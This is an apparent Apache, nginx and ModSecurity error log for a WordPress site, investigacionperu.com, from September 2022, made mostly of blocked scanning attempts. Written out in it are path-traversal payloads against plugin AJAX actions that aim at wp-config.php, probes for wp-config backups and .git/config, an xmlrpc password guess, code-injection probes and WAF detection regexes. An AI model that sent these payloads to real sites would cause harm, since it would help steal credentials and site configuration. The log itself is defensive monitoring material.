01 07:56:06.850125 2022] [:error] [pid 9583:tid 140292447512320] [client 94.232.43.93:51764] [client 94.232.43.93] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.old"] [unique_id "YxCr5rdrdfIAewuJZyACWQAAAMU"] [Thu Sep 01 11:22:53.436127 2022] [autoindex:error] [pid 9140:tid 140292388763392] [client 80.76.51.29:56522] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Sep 01 11:54:52.592727 2022] [autoindex:error] [pid 9583:tid 140292288050944] [client 51.254.215.154:57740] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Thu Sep 01 15:29:21.550763 2022] [:error] [pid 9141:tid 140292430726912] [client 51.255.91.234:43206] [client 51.255.91.234] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:<?xml version. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>admin</string></value></param><param><value><string>Admin(123) found within ARGS:<?xml version: \\x221.0\\x22?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>admin</string></value></param><param><value><string>Admin(123)</string></value></param></params></methodCall>"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "YxEWIedRVl5CaiXXskl7HQAAAIc"] [Thu Sep 01 19:59:02.229126 2022] [:error] [pid 9141:tid 140292405548800] [client 94.232.43.93:54184] [client 94.232.43.93] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "YxFVVudRVl5CaiXXskl9hQAAAIo"] [Fri Sep 02 22:26:31.010402 2022] [autoindex:error] [pid 21240:tid 139714447259392] [client 85.31.46.140:50452] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Sep 04 04:37:57.731622 2022] [:error] [pid 28894:tid 140192706955008] [client 94.232.43.93:34722] [client 94.232.43.93] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.backup"] [unique_id "YxRx9ZIs_-4tQpJbHgWiCAAAAM0"] [Sun Sep 04 15:00:01.751764 2022] [:error] [pid 27984:tid 140192631420672] [client 20.50.197.18:37300] [client 20.50.197.18] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "YxUDwax-Hx1V6lRmBZafjQAAAFY"] [Sun Sep 04 15:21:01.882936 2022] [:error] [pid 28894:tid 140192881227520] [client 20.50.197.18:37530] [client 20.50.197.18] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "YxUIrZIs_-4tQpJbHgW3AAAAAME"] [Sun Sep 04 15:54:55.458617 2022] [:error] [pid 27984:tid 140192698562304] [client 20.50.197.18:38086] [client 20.50.197.18] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "YxUQn6x-Hx1V6lRmBZaftAAAAE4"] [Mon Sep 05 06:27:33.083862 2022] [autoindex:error] [pid 20327:tid 139936351094528] [client 109.168.40.154:35214] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com 2022/09/05 20:41:46 [error] 19433#19433: *660113 access forbidden by rule, client: 3.123.30.244, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Sep 06 01:54:18.648939 2022] [autoindex:error] [pid 19570:tid 139936241989376] [client 20.127.196.24:41362] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Sep 06 08:37:42.838796 2022] [autoindex:error] [pid 7444:tid 140420789077760] [client 20.125.115.217:56862] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Sep 06 12:02:42.694673 2022] [autoindex:error] [pid 5826:tid 140420575086336] [client 20.242.2.0:41018] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Sep 07 15:45:01.374156 2022] [:error] [pid 9494:tid 139978680035072] [client 20.203.211.184:60674] [client 20.203.211.184] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=duplicator_download&file=/../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "YxkCzcAfFJWUiRt8yyc7swAAAME"] [Wed Sep 07 15:45:04.244289 2022] [:error] [pid 9494:tid 139978520573696] [client 20.203.211.184:60680] [client 20.203.211.184] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_BODY. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_BODY: action=wcmp_announcements_refresh_tab_data&tabname=%2F..%2F..%2F..%2Fwp-config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "YxkC0MAfFJWUiRt8yyc7tAAAANQ"] 2022/09/07 19:09:02 [error] 12401#12401: *735287 access forbidden by rule, client: 54.163.14.22, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2022/09/07 19:11:29 [error] 12402#12402: *736336 access forbidden by rule, client: 178.79.186.216, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2022/09/07 19:11:30 [error] 12402#12402: *736352 access forbidden by rule, client: 104.200.20.186, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2022/09/07 19:11:31 [error] 12401#12401: *736425 access forbidden by rule, client: 194.195.115.113, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2022/09/07 19:11:31 [error] 12401#12401: *736444 access forbidden by rule, client: 139.59.168.195, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Sep 07 19:11:31.786907 2022] [authz_core:error] [pid 12872:tid 139978621286144] [client 139.59.168.195:43672] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2022/09/07 19:11:32 [error] 12402#12402: *736478 access forbidden by rule, client: 104.200.20.186, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2022/09/07 19:11:32 [error] 12402#12402: *736487 access forbidden by rule, client: 159.223.9.243, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2022/09/07 19:11:32 [error] 12401#12401: *736550 access forbidden by rule, client: 173.255.252.198, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2022/09/07 19:11:34 [error] 12401#12401: *736644 access forbidden by rule, client: 139.59.168.195, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Sep 07 19:11:34.272178 2022] [authz_core:error] [pid 12872:tid 139978654856960] [client 139.59.168.195:43842] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2022/09/07 19:11:35 [error] 12401#12401: *736690 access forbidden by rule, client: 139.59.168.195, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Sep 07 19:11:35.434809 2022] [authz_core:error] [pid 12444:tid 139978495395584] [client 139.59.168.195:43884] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2022/09/07 19:11:35 [error] 12401#12401: *736702 access forbidden by rule, client: 54.163.14.22, server: investigacionperu.com, request: "GET /private/.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Sep 08 00:55:34.632392 2022] [:error] [pid 12595:tid 139978680035072] [client 173.252.95.116:45334] [client 173.252.95.116] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-524287"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/robots.txt"] [unique_id "YxmD1p4HQBe3io6yVI6bsQAAAME"] [Thu Sep 08 03:23:24.818226 2022] [ssl:warn] [pid 11097:tid 140195930724224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 08 03:23:24.965280 2022] [ssl:warn] [pid 11098:tid 140195930724224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 08 03:23:25.483688 2022] [ssl:warn] [pid 11098:tid 140195930724224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 08 03:23:27.308430 2022] [ssl:warn] [pid 11098:tid 140195930724224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 08 03:23:29.619767 2022] [ssl:warn] [pid 11519:tid 139958331811712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 08 03:23:29.753266 2022] [ssl:warn] [pid 11520:tid 139958331811712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 08 15:59:46.779823 2022] [:error] [pid 11542:tid 139958018897664] [client 152.89.196.13:55682] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:xxx. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:xxx: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/update-core-cron.php"] [unique_id "YxpXwm7cG-c8hj4jZPlcwAAAAAc"] 2022/09/08 15:59:58 [crit] 11404#11404: *770897 SSL_do_handshake() failed (SSL: error:14094459:SSL routines:ssl3_read_bytes:tlsv1 bad certificate status response:SSL alert number 113) while SSL handshaking, client: 190.237.41.96, server: 198.199.72.26:443 [Thu Sep 08 16:08:28.401791 2022] [:error] [pid 11544:tid 139958126032640] [client 185.255.89.45:55938] [client 185.255.89.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=duplicator_download&file=/../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "YxpZzDkuwO-PXPGu6kt9jwAAAIM"] [Thu Sep 08 16:08:32.612533 2022] [:error] [pid 11542:tid 139957876221696] [client 185.255.89.45:55944] [client 185.255.89.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_BODY. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_BODY: action=wcmp_announcements_refresh_tab_data&tabname=%2F..%2F..%2F..%2Fwp-config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "YxpZ0G7cG-c8hj4jZPlc0gAAABg"] [Thu Sep 08 19:17:50.382891 2022] [authz_core:error] [pid 11542:tid 139957951756032] [client 152.89.196.13:35198] AH01630: client denied by server configuration: /home/investig/public_html/wp-content/plugins/akismet/index.php [Fri Sep 09 02:01:30.451375 2022] [authz_core:error] [pid 11542:tid 139957893007104] [client 152.89.196.13:56264] AH01630: client denied by server configuration: /home/investig/public_html/wp-content/plugins/akismet/index.php [Fri Sep 09 03:08:24.738848 2022] [ssl:warn] [pid 19127:tid 139806132864896] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 09 03:08:24.849280 2022] [ssl:warn] [pid 19128:tid 139806132864896] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 09 03:08:25.048240 2022] [ssl:warn] [pid 19128:tid 139806132864896] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 09 03:08:26.826913 2022] [ssl:warn] [pid 19128:tid 139806132864896] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 09 03:08:29.062495 2022] [ssl:warn] [pid 19555:tid 140344187217792] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 09 03:08:29.176870 2022] [ssl:warn] [pid 19556:tid 140344187217792] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 09 06:26:42.586695 2022] [:error] [pid 19575:tid 140343861294848] [client 103.57.222.214:34002] [client 103.57.222.214] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=duplicator_download&file=/../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Yxsi8jYqSTVro6baAA5U-wAAAIk"] [Fri Sep 09 06:26:47.377525 2022] [:error] [pid 19574:tid 140343768975104] [client 103.57.222.214:34008] [client 103.57.222.214] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_BODY. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_BODY: action=wcmp_announcements_refresh_tab_data&tabname=%2F..%2F..%2F..%2Fwp-config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Yxsi9zrFnLaokR54KTV82gAAAFQ"] [Fri Sep 09 07:56:38.879368 2022] [:error] [pid 21027:tid 140343989831424] [client 152.89.196.13:39336] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/classic/inc/index.php"] [unique_id "Yxs4Biq-4aWe3nCE8zZ-yAAAAMI"] [Fri Sep 09 09:25:45.338894 2022] [ssl:warn] [pid 19556:tid 140344187217792] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Sep 09 10:39:28.598938 2022] [autoindex:error] [pid 1984:tid 140343878080256] [client 23.99.159.246:42522] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex 